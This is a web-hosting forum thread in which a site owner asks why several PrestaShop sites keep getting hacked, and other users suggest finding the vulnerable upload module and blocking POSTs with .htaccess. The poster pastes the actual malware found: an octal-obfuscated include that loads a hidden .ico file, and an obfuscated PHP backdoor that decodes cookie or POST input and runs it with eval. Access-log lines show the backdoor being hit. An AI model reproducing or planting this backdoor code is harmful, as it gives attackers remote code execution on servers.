Site keeps getting hacked, same hack across all sites on my server

[qzelle]

My sites keep getting hacked and it's a particular hack that inserts escaped html. Then it progresses to spam being sent from my server and shutting down the shared hosting account for being over resources.

Here's an example:

home/i***/public_html/fractals**.com/css/index.php

<?php
/*301f7*/

@include "\057hom\145/in\151tia\065/pu\142lic\137htm\154/fr\141cta\154spi\156.co\155/cl\141sse\163/mo\144ule\057.68\143bfa\1447.i\143o";

/*301f7*/
/*
* 2007-2017 PrestaShop
*
* NOTICE OF LICENSE
*
* This source file is subject to the Open Software License (OSL 3.0)
* that is bundled with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
* http://opensource.org/licenses/osl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to [email protected] so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade PrestaShop to newer
* versions in the future. If you wish to customize PrestaShop for your
* needs please refer to http://www.prestashop.com for more information.
*
*  @author PrestaShop SA <[email protected]>
*  @copyright  2007-2017 PrestaShop SA
*  @license    http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
*  International Registered Trademark & Property of PrestaShop SA
*/

header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");

header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");

header("Location: ../");
exit;

Then I'll get a random-letter.php file inserted in the same directory, like so:

Containing

<?php
$scgcwgc = '23p61vsfr-8#*ae0oy_uxHt594ck\'gmdil7nb';$nocgph = Array();$nocgph[] = $scgcwgc[21].$scgcwgc[12];$nocgph[] = $scgcwgc[11];$nocgph[] = $scgcwgc[15].$scgcwgc[31].$scgcwgc[7].$scgcwgc[23].$scgcwgc[1].$scgcwgc[31].$scgcwgc[23].$scgcwgc[1].$scgcwgc[9].$scgcwgc[23].$scgcwgc[15].$scgcwgc[31].$scgcwgc[13].$scgcwgc[9].$scgcwgc[25].$scgcwgc[31].$scgcwgc[26].$scgcwgc[3].$scgcwgc[9].$scgcwgc[13].$scgcwgc[34].$scgcwgc[31].$scgcwgc[26].$scgcwgc[9].$scgcwgc[0].$scgcwgc[24].$scgcwgc[3].$scgcwgc[36].$scgcwgc[15].$scgcwgc[15].$scgcwgc[26].$scgcwgc[10].$scgcwgc[0].$scgcwgc[34].$scgcwgc[0].$scgcwgc[4];$nocgph[] = $scgcwgc[26].$scgcwgc[16].$scgcwgc[19].$scgcwgc[35].$scgcwgc[22];$nocgph[] = $scgcwgc[6].$scgcwgc[22].$scgcwgc[8].$scgcwgc[18].$scgcwgc[8].$scgcwgc[14].$scgcwgc[2].$scgcwgc[14].$scgcwgc[13].$scgcwgc[22];$nocgph[] = $scgcwgc[14].$scgcwgc[20].$scgcwgc[2].$scgcwgc[33].$scgcwgc[16].$scgcwgc[31].$scgcwgc[14];$nocgph[] = $scgcwgc[6].$scgcwgc[19].$scgcwgc[36].$scgcwgc[6].$scgcwgc[22].$scgcwgc[8];$nocgph[] = $scgcwgc[13].$scgcwgc[8].$scgcwgc[8].$scgcwgc[13].$scgcwgc[17].$scgcwgc[18].$scgcwgc[30].$scgcwgc[14].$scgcwgc[8].$scgcwgc[29].$scgcwgc[14];$nocgph[] = $scgcwgc[6].$scgcwgc[22].$scgcwgc[8].$scgcwgc[33].$scgcwgc[14].$scgcwgc[35];$nocgph[] = $scgcwgc[2].$scgcwgc[13].$scgcwgc[26].$scgcwgc[27];foreach ($nocgph[7]($_COOKIE, $_POST) as $tmqgiuw => $xienbb){function paloe($nocgph, $tmqgiuw, $duopzf){return $nocgph[6]($nocgph[4]($tmqgiuw . $nocgph[2], ($duopzf / $nocgph[8]($tmqgiuw)) + 1), 0, $duopzf);}function tsqylud($nocgph, $anjcq){return @$nocgph[9]($nocgph[0], $anjcq);}function pslmija($nocgph, $anjcq){$pqbygpl = $nocgph[3]($anjcq) % 3;if (!$pqbygpl) {eval($anjcq[1]($anjcq[2]));exit();[spam-filter]$xienbb = tsqylud($nocgph, $xienbb);pslmija($nocgph, $nocgph[5]($nocgph[1], $xienbb ^ paloe($nocgph, $tmqgiuw, $nocgph[8]($xienbb))));}

 

Here are the things I've done to secure my server (I do this over and over)

1. Delete all the Prestashop files from the server, retaining the (cleaned, if necessary) files from the old install, like config and image files
   1. config/settings.inc.php
   2. folder with name of custom-named admin area (let's call it "custom-admin/")
   3. img/ images used for header ("logo.png" or "your-store-name.png")
   4. img/c folder (categories)
   5. img/p folder (products)
       

      My sites keep getting hacked and it's a particular hack that inserts escaped html. Then it progresses to spam being sent from my server and shutting down the shared hosting account for being over resources.

      Here's an example:

      home/i***/public_html/fractals**.com/css/index.php

   6. modules/ folder
2. Reinstall Prestashop (or Wordpress), deleting all the infected files and replacing it with a clean install Change the mysql user password for the install
3.  Change the FTP password
4.  Change the Cpanel password

They're not getting in through FTP or Cpanel or those things would work.

I have managed to cut down attacks on the Wordpress site using Wordfence and enabling the shared-hosting settings. However I still can't figure out what's attacking, and the site logs are too massive and I don't know what I'm looking for.

Any insight would be appreciated... if I can't get this under control I'm going to have to move back to the Wordpress solution because at leas they have a tool that cuts down hacking.

 

Edited August 9, 2018 by qzelle (see edit history)

[DataKick]

You really need to find the attack vector. Most likely this is caused by some module that allows uploading user content (ei. upload images / css files / etc). If the upload functionality is not implemented correctly, it can introduce a backdoor for attacker - it can let him upload any file, even php script.

So, you should first do audit of your installed modules. Beware - even disabled modules can be dangerous -- if you don't use some module, delete it from your server. If you find any module that could be culprit, then look inside your server's access log. Look for POST requests to files inside this module.

If you wish, I could have a look into the access log for you.

[qzelle]

3 hours ago, DataKick said:

You really need to find the attack vector. Most likely this is caused by some module that allows uploading user content (ei. upload images / css files / etc). If the upload functionality is not implemented correctly, it can introduce a backdoor for attacker - it can let him upload any file, even php script.

So, you should first do audit of your installed modules. Beware - even disabled modules can be dangerous -- if you don't use some module, delete it from your server. If you find any module that could be culprit, then look inside your server's access log. Look for POST requests to files inside this module.

If you wish, I could have a look into the access log for you.

 

Thanks for getting back to me on this and thanks for the specifics on what to look for in the access logs. Here's a handful of the first couple of search results for "POST":

91.79.25.81 - - [01/Jul/2018:05:33:04 -0500] "POST /contact-us HTTP/1.0" 200 30038 "http://fractalspin.com/contact-us" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.65 Safari/537.36 OPR/26.0.1656.24"

193.106.30.99 - - [01/Jul/2018:10:28:46 -0500] "POST /wp-content/yt.php HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"

107.172.15.78 - - [01/Jul/2018:13:28:10 -0500] "POST //fractalspin.com/ HTTP/1.0" 200 42395 "http://www.google.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:25.0) Gecko/20100101 Firefox/25.0"

89.107.184.55 - - [01/Jul/2018:13:45:38 -0500] "POST /js/?gtbw=skale HTTP/1.0" 200 2203 "https://fractalspin.com/js/?gtbw=skale" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"

79.110.18.136 - - [01/Jul/2018:14:47:14 -0500] "POST /index.php%3Fcontroller%3Dcontact HTTP/1.0" 200 97179 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"

198.23.213.6 - - [01/Jul/2018:16:31:27 -0500] "POST /contact-us HTTP/1.0" 200 42395 "http://www.google.com" "Mozilla/5.0 (IE 11.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; rv:11.0) like Gecko"

Weirdly, there are  no "/contact us" or  "wp-content/yt.php" directories or files in the Prestashop directory.

However, there is a hacked file in the /js/ directory: https://0bin.net/paste/LmMYAebUA2IRBUme#S7Fs8-cK3/kJ+5pRiITG6TYQmGkise3QJA/dWqJMRm2

I appreciate the offer of looking into this. Here's the whole July log: https://gist.githubusercontent.com/quantazelle/c837669ee2f11822f805aae327e56e99/raw/f72b4cf2e5148c8e5344d6f291964209a8bc03b5/fractalspin.initializemedia.com-Jul-2018

Thanks, Datakick!

 

 

 

[DataKick]

Hi,

I looked at the  error log, but I don't think that the original attack occurred in July. There's actually an evidence that the exploit file was already present on your server as of July 1st:

87.98.139.37 - - [01/Jul/2018:10:39:39 -0500] "POST /js/?zysaz=udydf HTTP/1.0" 200 102 "https://fractalspin.com/js/?zysaz=udydf" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30

So I'm afraid I can't find the attack vector using this error log. Could you share with me the log from previous months? For safety reason you should send link via PM

 

Anyway, it seems that the exploit is always in index.php in js directory. That suggest that you have some module installed that allows you to upload custom javascript files (and probably allows upload php files as well). Please look at your modules (especially those that comes with your theme) to see if any one of them contains such functionality.

You can also use .htaccess file to stop the attacker from actually utilizing uploaded index.php file -- attacker can still upload exploit index.php file on your server, but he won't be able to access it anymore. Following rules forbids POST request to /js directory

 

	RewriteCond %{REQUEST_METHOD} POST
	RewriteCond %{REQUEST_URI} /js* [NC]
	RewriteRule .* - [F,L]

 

I hope this helps a bit.

 

 

[qlangiul]

I've had a similar problem.
I've noticed the index.php files. and all have the something like your

@include "\057hom\145/in\151tia\065/pu\142lic\137htm\154/fr\141cta\154spi\156.co\155/cl\141sse\163/mo\144ule\057.68\143bfa\1447.i\143o";

you notice that at the end of the path there is an .ico file.

that's the most likely source of all your problems.

I'm cleaning now. I've started with the .ico file. 

After I'm done. I'll check to see if there are still files being genrated.